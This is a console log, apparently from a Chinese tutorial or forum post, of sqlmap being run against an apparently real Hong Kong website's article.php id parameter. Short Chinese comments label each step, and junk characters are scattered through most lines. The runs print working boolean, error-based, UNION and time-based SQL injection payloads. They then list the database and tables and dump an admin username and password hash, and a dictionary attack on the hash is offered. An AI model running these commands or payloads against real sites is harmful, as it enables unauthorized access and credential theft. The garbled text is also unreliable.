D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; K$ ~! o+ S' o# l2 B% P
ms "Mysql" --current-user /* 注解:获取当前用户名称% N2 B: J% Y( q6 K! x& m
sqlmap/0.9 - automatic SQL injection and database takeover tool
$ v: N. _' ` ?5 f4 {; a: @ http://sqlmap.sourceforge.net starting at: 16:53:54
; Z3 A2 v( u8 d3 Y[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' `+ H+ X& `) h( p
session file0 C/ H' P5 Q2 Y6 r. f9 V
[16:53:54] [INFO] resuming injection data from session file
2 R" c$ S7 Q0 v[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
. A1 {: T: \* r( b' r- s[16:53:54] [INFO] testing connection to the target url
* Z2 j3 G5 V: qsqlmap identified the following injection points with a total of 0 HTTP(s) reque# M0 O' t% M [6 N
sts:' N+ ?5 J- E& K$ [& x
---9 O0 P( N/ d% y# b' B: l
Place: GET
" i/ V0 T7 j; S6 h+ a: B. wParameter: id
* A0 K; V1 J, [( P+ v' b$ Q Type: boolean-based blind4 H% S# R+ i/ ?
Title: AND boolean-based blind - WHERE or HAVING clause4 M, G3 `, j- G! {; ]7 _ U1 y
Payload: id=276 AND 799=799
9 b) E) o9 s8 Z' e' `1 @& A7 q" i Type: error-based6 @' W8 m5 H9 C
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 s- n8 k+ z/ J1 A
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ o. R. d6 d4 O7 e0 b* A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& R0 a& m7 m6 R
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 Q5 E" y: V0 G
Type: UNION query
1 }/ f2 c4 x0 Z' ? Title: MySQL UNION query (NULL) - 1 to 10 columns; l& a5 m/ t/ c; _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- l: q8 ?" D9 z
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 L7 H$ h+ I. R; M+ P8 r1 [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' o# s0 F4 P* Z# e8 m( q* `) A
Type: AND/OR time-based blind
4 ?( S5 C. y: d' v7 ] Title: MySQL > 5.0.11 AND time-based blind, J) L0 Z2 j3 X. D
Payload: id=276 AND SLEEP(5)+ e0 b' R0 D: Q |( c
---
+ Z5 [/ v, B8 E$ i4 r4 a4 b0 ^[16:53:55] [INFO] the back-end DBMS is MySQL
/ i: \+ }' W, ^7 O% G. k& V0 Y+ Rweb server operating system: Windows2 _$ Y* k- {/ P# E" N; b
web application technology: Apache 2.2.11, PHP 5.3.0: O( _" [: U" n) L
back-end DBMS: MySQL 5.01 m2 d2 W7 u/ P( o$ X
[16:53:55] [INFO] fetching current user2 J9 p0 z8 t4 O+ j# F6 M
current user: 'root@localhost' 7 a* _; P3 W- ~, g+ [
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
! {$ z% M, g% {& t7 Z2 T5 Mtput\www.wepost.com.hk' shutting down at: 16:53:58
6 k4 y; E. H+ B- i8 a9 j5 z5 s* H& h) a2 r) k. q( X
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- ?/ ^# P$ d8 [7 k( U: Oms "Mysql" --current-db /*当前数据库, V% J/ a3 S" I$ [% j2 B m7 C
sqlmap/0.9 - automatic SQL injection and database takeover tool
; |6 A( @/ I! U- ]8 Q2 D* x http://sqlmap.sourceforge.net starting at: 16:54:162 j- S8 X" l6 ^: J
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
) R+ A2 V X7 k, `2 e! O session file A$ ]8 y* c' w p- c7 H4 f6 o
[16:54:16] [INFO] resuming injection data from session file- {7 Q$ @9 I5 X( h9 {
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file% j6 w5 ^$ B! G9 P
[16:54:16] [INFO] testing connection to the target url
! U3 ~, A8 V; f9 v! osqlmap identified the following injection points with a total of 0 HTTP(s) reque
& L' ^2 `0 w, Q3 I% Bsts:* q d6 i: g3 h5 @
---3 K" y/ F$ n/ V, A+ _
Place: GET
' ~4 ]$ k' j" K9 zParameter: id5 B0 v5 [% I5 V8 f! A
Type: boolean-based blind( D# E, ~# _# b
Title: AND boolean-based blind - WHERE or HAVING clause8 m B$ E/ x; a. o* Z" g7 i
Payload: id=276 AND 799=799
* A7 M& k7 K$ J. M, ]* R3 [ Type: error-based+ S1 w1 r$ m" w
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- |8 Q' G+ w+ R% x9 F
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 a0 J! h) W8 p
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ Z$ F2 f+ L, u. T! Y2 T
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 t8 Z6 k/ A1 r/ r Type: UNION query
4 \- D2 k3 ^0 m3 A0 v2 C% Z1 t- S Title: MySQL UNION query (NULL) - 1 to 10 columns
) @& O3 B2 b9 A) _ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ p6 @) K l. J2 K. |6 z6 A
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; i/ F3 m2 B. ?, l6 p5 ?2 ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' l5 X: V* e# B5 Y% o
Type: AND/OR time-based blind3 L; J5 y2 i+ r
Title: MySQL > 5.0.11 AND time-based blind
6 Q, ^; G. g2 D( g' i$ i0 R6 h3 w Payload: id=276 AND SLEEP(5)8 o* k6 d$ V5 K- |! G
---
5 I1 S6 I) Y6 `5 Z* d* Q[16:54:17] [INFO] the back-end DBMS is MySQL
6 A# _0 [* B) ^/ _: s* |web server operating system: Windows- @1 s9 f8 q( c* ?. @
web application technology: Apache 2.2.11, PHP 5.3.0 c! P/ W# o' ]5 |7 D2 K
back-end DBMS: MySQL 5.0$ W' M) }5 x8 Q
[16:54:17] [INFO] fetching current database
/ u w5 d3 |- E% ]; w, Y. [current database: 'wepost'
7 ^( D1 G/ B% e7 A, q5 \9 E" e[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
* x7 E5 U% I/ C+ s3 Y o- Q7 D! f v! s* Dtput\www.wepost.com.hk' shutting down at: 16:54:18+ {2 A: Y3 h! Z6 K3 m2 |" L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 g Q+ | ?2 Q3 f0 \ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名7 y' p7 t* _# Q: p/ B2 ?
sqlmap/0.9 - automatic SQL injection and database takeover tool. X6 D) i4 Z( e. r9 {
http://sqlmap.sourceforge.net starting at: 16:55:25
% K5 t X1 p3 u3 Q% T[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as3 o, C; e1 f* A3 q( f
session file1 n6 w: T" M6 x, p
[16:55:25] [INFO] resuming injection data from session file7 j+ U, ^; J% k4 g
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
; Y7 V H* V. ?+ D1 e[16:55:25] [INFO] testing connection to the target url# _5 l) C' W$ x5 v# O3 A, O" F7 q: A
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 W" `; s. ?6 p! C5 ysts:
( [' h, {) H' O$ w0 d* U! {) Q---
9 R, J! Q7 y8 \8 w% nPlace: GET, \) v2 M% y, W( x y0 K5 Q' |
Parameter: id
2 H2 \6 O" h! u Type: boolean-based blind
( n5 [& s$ I1 H F8 D Title: AND boolean-based blind - WHERE or HAVING clause( w2 T" u5 O; A8 v9 s
Payload: id=276 AND 799=799
2 I) U$ X/ Y+ t, S* B9 t Type: error-based
/ s8 H( b8 h. C8 s# g. k' k1 I# } Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ H6 Z7 s8 u4 _' z$ C' z3 ~7 n @0 r Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 o4 Q; W) T0 L& u( f% M& a
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 S; I) k: y* A) A- n a5 x+ `
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 w6 }% u1 E' M1 T' V) G! _" X Type: UNION query
5 o# @; O( j7 a4 Z Title: MySQL UNION query (NULL) - 1 to 10 columns- L; }& _" ~6 L$ x' j4 K/ Q: K
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 d( H7 V: `, F1 O; j0 [3 i9 `1 C7 N
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! H5 b* i9 T% P5 }$ i
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- g4 F i0 q7 z* r Type: AND/OR time-based blind
\( J4 G' w' S4 ^7 _1 q" A/ v2 ?( P- _ Title: MySQL > 5.0.11 AND time-based blind
- q6 a& ]( r( j8 i- m3 R Payload: id=276 AND SLEEP(5)
' R4 W/ z5 e/ U/ @3 c3 v---
& L2 V# n* `- n) F+ r/ Q% K/ @[16:55:26] [INFO] the back-end DBMS is MySQL
* k" L& D, _, `; A) a/ n& W- Dweb server operating system: Windows
+ }( O% U, a% P; b- L3 H3 N4 A! ~web application technology: Apache 2.2.11, PHP 5.3.0
1 I- X8 P* r+ m L3 M$ \6 I/ ]) Oback-end DBMS: MySQL 5.0* E+ p5 [% |" m- E3 ~
[16:55:26] [INFO] fetching tables for database 'wepost': z. |0 C. F" D$ }6 ?7 Q
[16:55:27] [INFO] the SQL query used returns 6 entries$ V- _. }! W) o9 d. i4 C
Database: wepost% _: ?( X; P3 |+ \
[6 tables]9 u6 z( `# U# n+ d; H
+-------------+
: E( _. Q8 z; R* j" |9 B3 m| admin |
6 m& a( S2 J- `1 S| article |! a4 \1 K4 Y/ M# `$ m* P+ Z
| contributor |
! V# s- r" g9 l% Q1 Z2 U| idea |1 R/ P2 a7 E% n; C; d* ^2 M" [
| image |
$ H& Z( g# j6 @/ Y9 Q* y; m+ y| issue |% }0 l: _6 V# s
+-------------+
. l& r. o0 F" [. [, }) n a/ z2 [: S[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ n* g" [7 N6 h* N# r$ Ntput\www.wepost.com.hk' shutting down at: 16:55:33
# _% K5 F1 _; {( ` l8 }1 C) z
E# `/ `; l) b$ a# Y3 hD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
V0 S" h _2 h8 \ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名6 `+ M' c0 F) f2 P* u6 r
sqlmap/0.9 - automatic SQL injection and database takeover tool# G9 `+ ?1 a- E+ n
http://sqlmap.sourceforge.net starting at: 16:56:06% {0 U7 {5 c; y# y! c3 z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 L, c& y+ l, a; H; l, W6 Lsts:
W6 @0 o& U/ w8 U) y- G---' G, g# H1 _# k# A2 a: R& F
Place: GET
1 M2 N9 [; @" \" V/ z+ j) ^- O6 PParameter: id3 h, P d2 t% P, O$ ]
Type: boolean-based blind
9 M& w$ L; l V3 @3 j8 e+ k Title: AND boolean-based blind - WHERE or HAVING clause
; r2 }$ p1 q; _ Payload: id=276 AND 799=799
) a' c- ?2 d# [$ \. }; B Type: error-based- R* Z5 C+ j+ o' X
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 {7 z6 L" r$ y- ?; m& @( U5 ?0 ^/ Z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( ]: u; z* z; K( y( H
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 ^; l5 S, N, Q$ x; W) v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) ^0 | t" c& H* }5 f5 G" t
Type: UNION query
( w+ g9 W$ J' a& \ i: Y Title: MySQL UNION query (NULL) - 1 to 10 columns: d- A4 s. t+ ]9 x
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' _: i/ J8 `9 E. k
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 _, J6 k3 S( {- U" p+ ICHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## d$ ]& z; ?' Z9 f6 X. n" o8 o8 h- x
Type: AND/OR time-based blind( B5 }! s$ E- h4 U9 E T( D
Title: MySQL > 5.0.11 AND time-based blind3 C- }, B) N k% `7 y% X3 l B
Payload: id=276 AND SLEEP(5)6 d' e; a: N$ ^! c" j& I( s
---
7 ~$ d U: A5 L7 C1 u% T! ]4 Vweb server operating system: Windows
7 _2 }; H8 s, `( t8 x) o& {web application technology: Apache 2.2.11, PHP 5.3.0
+ [; M }5 Y* y9 ^back-end DBMS: MySQL 5.0
3 Z5 K; v; |( v3 [: m[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se1 y% H) a1 B! H1 G' ]5 ~
ssion': wepost, wepost
! V- ]7 w) x0 l/ t! g/ dDatabase: wepost9 m3 [! D/ q2 H! B5 P
Table: admin( J6 w& j3 A* q, n& ~
[4 columns]
' r( u; f! r4 [$ Y+----------+-------------+
- c1 t- o0 I- z! {| Column | Type |
2 ~3 e, R, I" X. @; T$ C/ s+----------+-------------+
4 w# [8 H' m' G. z. [9 U+ d| id | int(11) |! v7 {9 R+ P# n: |' b, |
| password | varchar(32) |
5 q$ R/ [. T7 J N! H| type | varchar(10) |
3 [ V4 D7 t) C| userid | varchar(20) |
' L- A1 M& m3 h5 O4 v6 U+----------+-------------+& \( ?6 W% c7 t# ] ^9 e9 E; b
shutting down at: 16:56:19: D4 _7 _: U- h( `# T; v
) z f; l7 V7 ^' A) O7 h! C7 _% ED:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* |1 {8 r: U7 xms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
/ W) J1 [- D8 n/ {$ v& M' D/ t: | sqlmap/0.9 - automatic SQL injection and database takeover tool
4 v2 N" D& Y1 u http://sqlmap.sourceforge.net starting at: 16:57:14
' [6 m- x+ K. b8 h3 ksqlmap identified the following injection points with a total of 0 HTTP(s) reque
" F2 ]* `2 T( o; \% R Fsts:! e; o4 |0 b: K2 V
---
" U( Q+ i) v! E6 D5 {; lPlace: GET
6 k9 E) A# @3 P& s' Q# vParameter: id
8 m) j& v" q; z& m6 ^5 f Type: boolean-based blind" W* j) {9 G9 j; d; s( F7 G
Title: AND boolean-based blind - WHERE or HAVING clause$ l' N# G7 x# h
Payload: id=276 AND 799=799
' V0 m( M& { S+ h p5 X; } Type: error-based
$ H/ {! D/ P% j' T- y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ i( S/ q; y% f+ t; n1 n+ N1 I
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, k0 X2 y5 y& v9 S7 n9 r- l
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" W- v* T- Y, y) V$ C: I! n% \2 U5 d),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% g: }! ~- { p: v# @8 U$ C } Type: UNION query0 |6 P" k. l% s8 Q
Title: MySQL UNION query (NULL) - 1 to 10 columns
4 ^1 Q3 g7 P) ?, J8 m Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) A ^. @ a8 ?5 c* V
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ m) r2 n& f7 H ]CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 J, u* T3 i! S. W1 B) I
Type: AND/OR time-based blind) B! d0 C1 M; j. c* }/ N" s" l
Title: MySQL > 5.0.11 AND time-based blind. E2 s! z+ v/ R7 ~' {* }
Payload: id=276 AND SLEEP(5)2 _2 ]" x2 ]6 e) R' E
---7 y1 v/ c# d z
web server operating system: Windows- `5 a: b' \, \5 B
web application technology: Apache 2.2.11, PHP 5.3.0
0 [* a9 [+ M' k" I4 X5 r( sback-end DBMS: MySQL 5.0
4 V) W2 W L- E, zrecognized possible password hash values. do you want to use dictionary attack o: |- Z; U* R9 ]
n retrieved table items? [Y/n/q] y+ F* g0 h3 H+ \6 S
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
" {' Q& Y( n# o0 g: I& D' `, sdo you want to use common password suffixes? (slow!) [y/N] y
- A- p' z" W! @5 a- RDatabase: wepost
' D" d, v* l. [% g+ `4 z/ oTable: admin
' G' _; b3 X* I! w" Q$ S. Y% o) p[1 entry]/ E# M* f+ ~ }/ }. r9 n' ~) y# e
+----------------------------------+------------++ M: C5 S& s# F* A
| password | userid |
r- F4 G4 E$ @+----------------------------------+------------+% z; g# O2 j, a
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |; r& `9 }1 {% n6 c
+----------------------------------+------------+
# s# _/ m4 N: l8 S ]; C shutting down at: 16:58:14
! [% p9 t9 }. w3 X! j( K$ N6 I. m- F$ L9 U( I9 @$ Q2 i8 S; k( [ g
D:\Python27\sqlmap> |